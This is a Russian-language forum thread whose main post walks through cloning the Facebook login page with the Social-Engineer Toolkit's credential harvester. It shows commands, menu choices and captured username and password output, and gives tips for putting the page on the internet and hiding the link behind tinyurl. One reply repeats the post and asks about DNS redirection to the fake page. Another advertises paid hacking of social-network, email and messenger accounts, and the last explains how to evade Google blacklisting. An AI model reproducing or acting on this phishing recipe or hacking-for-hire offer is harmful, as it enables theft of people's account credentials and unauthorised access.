Набор инструментов социальной инженерии Kali - Сборщик учётных данных и взлом Facebook

Sergei webware

Active member
07.02.2016
37
98
#1
Взлом Facebook

Поговорим о том, как взламывать Facebook. Данное руководство должно расширить ваши знания о сетях, а также дать вам представление о том, как создаются поддельные веб-страницы, чтобы вы могли защититься от подобных атак. Не пытайтесь использовать эту информацию для взлома чужой учётной записи, иначе можете столкнуться с судебным иском. Если вы не читали предыдущий пост, сделайте это. Он не только познакомит вас с техническим подробностями, но и подготовит к тому, чем мы сейчас займёмся.



Набор инструментов социальной инженерии

Люди - слабейшее звено любой системы безопасности
Набор для социальной инженерии эксплуатирует не уязвимости в механизмах сервисов, а слабость человеческого фактора безопасности. Прежде чем мы перейдём к процессу взлома, взгляните на
Для просмотра контента необходимо: Войти или зарегистрироваться
:

Набор инструментов социальной инженерии (SET) был придуман и написан основателем TrustedSec. Это открытый проект на языке Python, направленный на испытания проникновением с использованием методов социальной инженерии. SET был представлен на крупных конференциях, включая Blackhat, DerbyCon, Defcon и ShmooCon. Сегодня этот набор, число загрузок которого превысило два миллиона, является стандартным инструментом для тестирования проникновением с использование социальной инженерии и поддерживается всем сообществом по сетевой безопасности.

Kali Linux

Мне не стоило бы упоминать об этом, но я всё равно это сделаю. Для данного руководства вам понадобится Kali Linux. В верхней части этой страницы вы найдёте ссылку на полное руководство по Kali Linux. Впрочем, лучше я дам её прямо здесь - Kali Linux: Что это такое, и как её установить.

Se-toolkit

Запустите Kali Linux. В консоли/терминале введите команду
Код:
se-toolkit
root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage:
Для просмотра контента необходимо: Войти или зарегистрироваться
[---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit:
Для просмотра контента необходимо: Войти или зарегистрироваться


Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>

Теперь введите следующие команды, нажимая Enter после каждой из них.

1 [enter] 2 [enter] 3 [enter]

Объяснение
  • Цифра 1 выбирает «Атаки с применением социальной инженерии». Очевидный выбор, если вы прочитаете другие опции от 1 до 9 (и 99 для выхода)
  • Цифра 2 выбирает «Векторы атаки веб-сайта». Здесь всё уже не так очевидно. Модуль веб-атаки - уникальный способ использования нескольких веб-атак с целью скомпрометировать намеченную жертву.
  • Ну а цифра 3 выбирает «Сборщик учётных данных». Сбор учётных данных осуществляется посредством клонирования веб-сайта, на котором есть форма входа с логином и паролем. Кроме этого, данная методика позволяет перехватить всю информацию, которую пользователь публикует на сайте.
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Введите 2, чтобы выбрать инструмент клонирования сайтов.

Найдите свой IP

В новом окне терминала выполните команду ifconfig. Так вы узнаете свой ipv4 адрес, который нам и нужен.

Вернёмся к se-toolkit

Теперь утилита попросит вас указать IP адрес, на который будут отправлены данные. Это ваш IP адрес. Поскольку мы используем ваш внутренний IP адрес (так же известен, как локальный IP), поддельная страничка facebook будет работать только для компьютеров, подключённых к вашей локальной сети.

Далее нужно указать адрес клонируемой страницы. Введите
Для просмотра контента необходимо: Войти или зарегистрироваться
.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.

set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example:
Для просмотра контента необходимо: Войти или зарегистрироваться


set:webattack> Enter the url to clone:
Для просмотра контента необходимо: Войти или зарегистрироваться


Теперь запустите браузер в Kali Linux и введите в адресную строку свой IP. На экране появится страница входа facebook. Ведите в текстовые поля любые данные и попытайтесь войти на сайт. Эта информация сразу появится в окне se-toolkit. Если вы используете VMWare или virtualbox попробуйте ввести тот же IP адрес в браузер внутри виртуальной машины. Ваша поддельная страничка будет работать и там.

Живая демонстрация

Чтобы убедиться в том, что данная демонстрация - не просто повторение того, что вы уже знаете, я решил скопировать страницу входа facebook, вместо главной страницы. Она выглядит немного по-другому. Вот скриншот моих действий.



IP адрес, который вы видите на изображении - это мой внутренний адрес, полученный с помощью ifconfig. В данном случае 192.168.154.133. Адрес клонируемой страницы -
Для просмотра контента необходимо: Войти или зарегистрироваться
. Теперь посмотрим, справляется ли со своей работой сборщик учётных данных.

На самой машине с Kali Linux



Ввод IP в браузер приводит к отображению поддельной страницы входа. Вдобавок к этому, se-toolkit регистрирует визит и сообщает 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -

Если мы введём что-нибудь в текстовые поля, эта информация тоже будет передана se-toolkit. Я ввёл «hackingwithkalilinux» в поле для имени пользователя и «password» в поле пароля. Вот что показывает se-toolkit:



Код:
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Обратите внимание, что se-toolkit может продолжить вывод данных в консоль. Но большая их часть для нас пока не важна.

На машине с Windows 8 (хост)

Теперь я запустил Kali на виртуальной машине, которая работает на компьютере под управлением Windows 8. Посмотрим, сработает ли наш метод взлома в этой ситуации. Кроме этого, мы узнаем, способны ли современные браузеры указать пользователю на то, что страница является поддельной, и посмотрим, заблокирует ли брандмауэр передачу данных.

Я ввёл «windows8хост» и «пароль2», а затем нажал на кнопку входа. Вот что из этого вышло. А поскольку я уже был авторизован в данном браузере на Facebook, поддельная страничка перенаправила меня на оригинальный сайт.

Код:
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2
Вывод: Данный метод отлично работает в пределах локальной сети.

Заставьте его работать через интернет

Для того чтобы эти техника начала работать через интернет, вам придётся использовать свой публичный IP адрес вместо частного. Узнайте свой публичный IP адрес с помощью Google, а затем воспользуйтесь им. Мы можете прибегнуть к помощи tinyurl или другого подобного сервиса, чтобы замаскировать url. В некоторых случаях придётся включить переадресацию портов, поскольку ваш маршрутизатор может блокировать трафик на 80 порте. Брандмауэр тоже может стать источником проблем. В следующем посте мы выведем ваш сборщик учётных данных в интернет и завершим данное руководство, сделав его полезным с практической точки зрения.

Источник
Для просмотра контента необходимо: Войти или зарегистрироваться
 
L
#3
можно ли взломать одноклассники таким же образом?
 

Вадим

Active member
11.05.2016
27
5
#4
думаю возможно, главное настроить видимость компа из инета:(
 

Mo-riarty

New member
31.08.2017
3
0
#6
Взлом Facebook

Поговорим о том, как взламывать Facebook. Данное руководство должно расширить ваши знания о сетях, а также дать вам представление о том, как создаются поддельные веб-страницы, чтобы вы могли защититься от подобных атак. Не пытайтесь использовать эту информацию для взлома чужой учётной записи, иначе можете столкнуться с судебным иском. Если вы не читали предыдущий пост, сделайте это. Он не только познакомит вас с техническим подробностями, но и подготовит к тому, чем мы сейчас займёмся.



Набор инструментов социальной инженерии



Набор для социальной инженерии эксплуатирует не уязвимости в механизмах сервисов, а слабость человеческого фактора безопасности. Прежде чем мы перейдём к процессу взлома, взгляните на
Для просмотра контента необходимо: Войти или зарегистрироваться
:

Набор инструментов социальной инженерии (SET) был придуман и написан основателем TrustedSec. Это открытый проект на языке Python, направленный на испытания проникновением с использованием методов социальной инженерии. SET был представлен на крупных конференциях, включая Blackhat, DerbyCon, Defcon и ShmooCon. Сегодня этот набор, число загрузок которого превысило два миллиона, является стандартным инструментом для тестирования проникновением с использование социальной инженерии и поддерживается всем сообществом по сетевой безопасности.

Kali Linux

Мне не стоило бы упоминать об этом, но я всё равно это сделаю. Для данного руководства вам понадобится Kali Linux. В верхней части этой страницы вы найдёте ссылку на полное руководство по Kali Linux. Впрочем, лучше я дам её прямо здесь - Kali Linux: Что это такое, и как её установить.

Se-toolkit

Запустите Kali Linux. В консоли/терминале введите команду
Код:
se-toolkit
root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
Update verified, config timestamp is: 2014-05-26 08:26:33.526119
SET is using the new config, no need to restart

_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage:
Для просмотра контента необходимо: Войти или зарегистрироваться
[---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit:
Для просмотра контента необходимо: Войти или зарегистрироваться


Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>

Теперь введите следующие команды, нажимая Enter после каждой из них.

1 [enter] 2 [enter] 3 [enter]

Объяснение

  • Цифра 1 выбирает «Атаки с применением социальной инженерии». Очевидный выбор, если вы прочитаете другие опции от 1 до 9 (и 99 для выхода)
    Цифра 2 выбирает «Векторы атаки веб-сайта». Здесь всё уже не так очевидно. Модуль веб-атаки - уникальный способ использования нескольких веб-атак с целью скомпрометировать намеченную жертву.
    Ну а цифра 3 выбирает «Сборщик учётных данных». Сбор учётных данных осуществляется посредством клонирования веб-сайта, на котором есть форма входа с логином и паролем. Кроме этого, данная методика позволяет перехватить всю информацию, которую пользователь публикует на сайте.
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Введите 2, чтобы выбрать инструмент клонирования сайтов.

Найдите свой IP

В новом окне терминала выполните команду ifconfig. Так вы узнаете свой ipv4 адрес, который нам и нужен.

Вернёмся к se-toolkit

Теперь утилита попросит вас указать IP адрес, на который будут отправлены данные. Это ваш IP адрес. Поскольку мы используем ваш внутренний IP адрес (так же известен, как локальный IP), поддельная страничка facebook будет работать только для компьютеров, подключённых к вашей локальной сети.

Далее нужно указать адрес клонируемой страницы. Введите
Для просмотра контента необходимо: Войти или зарегистрироваться
.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.

set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example:
Для просмотра контента необходимо: Войти или зарегистрироваться


set:webattack> Enter the url to clone:
Для просмотра контента необходимо: Войти или зарегистрироваться


Теперь запустите браузер в Kali Linux и введите в адресную строку свой IP. На экране появится страница входа facebook. Ведите в текстовые поля любые данные и попытайтесь войти на сайт. Эта информация сразу появится в окне se-toolkit. Если вы используете VMWare или virtualbox попробуйте ввести тот же IP адрес в браузер внутри виртуальной машины. Ваша поддельная страничка будет работать и там.

Живая демонстрация

Чтобы убедиться в том, что данная демонстрация - не просто повторение того, что вы уже знаете, я решил скопировать страницу входа facebook, вместо главной страницы. Она выглядит немного по-другому. Вот скриншот моих действий.



IP адрес, который вы видите на изображении - это мой внутренний адрес, полученный с помощью ifconfig. В данном случае 192.168.154.133. Адрес клонируемой страницы -
Для просмотра контента необходимо: Войти или зарегистрироваться
. Теперь посмотрим, справляется ли со своей работой сборщик учётных данных.

На самой машине с Kali Linux



Ввод IP в браузер приводит к отображению поддельной страницы входа. Вдобавок к этому, se-toolkit регистрирует визит и сообщает 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -

Если мы введём что-нибудь в текстовые поля, эта информация тоже будет передана se-toolkit. Я ввёл «hackingwithkalilinux» в поле для имени пользователя и «password» в поле пароля. Вот что показывает se-toolkit:



Код:
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Обратите внимание, что se-toolkit может продолжить вывод данных в консоль. Но большая их часть для нас пока не важна.

На машине с Windows 8 (хост)

Теперь я запустил Kali на виртуальной машине, которая работает на компьютере под управлением Windows 8. Посмотрим, сработает ли наш метод взлома в этой ситуации. Кроме этого, мы узнаем, способны ли современные браузеры указать пользователю на то, что страница является поддельной, и посмотрим, заблокирует ли брандмауэр передачу данных.

Я ввёл «windows8хост» и «пароль2», а затем нажал на кнопку входа. Вот что из этого вышло. А поскольку я уже был авторизован в данном браузере на Facebook, поддельная страничка перенаправила меня на оригинальный сайт.

Код:
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2
Вывод: Данный метод отлично работает в пределах локальной сети.

Заставьте его работать через интернет

Для того чтобы эти техника начала работать через интернет, вам придётся использовать свой публичный IP адрес вместо частного. Узнайте свой публичный IP адрес с помощью Google, а затем воспользуйтесь им. Мы можете прибегнуть к помощи tinyurl или другого подобного сервиса, чтобы замаскировать url. В некоторых случаях придётся включить переадресацию портов, поскольку ваш маршрутизатор может блокировать трафик на 80 порте. Брандмауэр тоже может стать источником проблем. В следующем посте мы выведем ваш сборщик учётных данных в интернет и завершим данное руководство, сделав его полезным с практической точки зрения.

Источник
Для просмотра контента необходимо: Войти или зарегистрироваться
Подскажите пожалуйста как настроить переадресацию DNS, что бы к примеру если с компа в локальной сети заходили на сайт Фэйсбука и попадали на наш Фэйковый сайт .
 

MrWolf

Well-known member
30.11.2016
65
35
#7
Профессиональные услуги взлома:
1.Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей.
2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com
- live.com
- mail.com
- aol.com
- hotmail.com
- mail.ru
- yandex.ru
- bk.ru
- rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта...
3. Взлом Skype и любой другой телефонии.
4.- Взлом viber
- whatsapp и любых других приложений.
5.Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.
- Анонимность и конфиденциальность полностью соблюдается
- Разумные цены
- Индивидуальный подход к каждому клиенту
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
- Профессиональное обучение взлому, результат успешного обучения 100%.
Что куришь? как c##@ можно зайти на форум и не читать правила?o_O в БАНЮ его.....
 
Последнее редактирование:

Axon

Well-known member
04.01.2017
63
69
#8
Что-то мне подсказывает, что он не для того, чтобы правила читать зарегистрировался тут)))
 

kot-gor

Gold Team
07.09.2016
481
527
#9
Добрый вечер,дополню, и наверное сэкономлю время начинающим пентестерам, данные сайты на белых ip живут не больше суток, у меня был такой случай что максимум пару часов он продержался..а дальше служба гугл вносит их в свои черные списки..что бы увеличить время живучести, нужно писать свой шаблон, а не клонировать.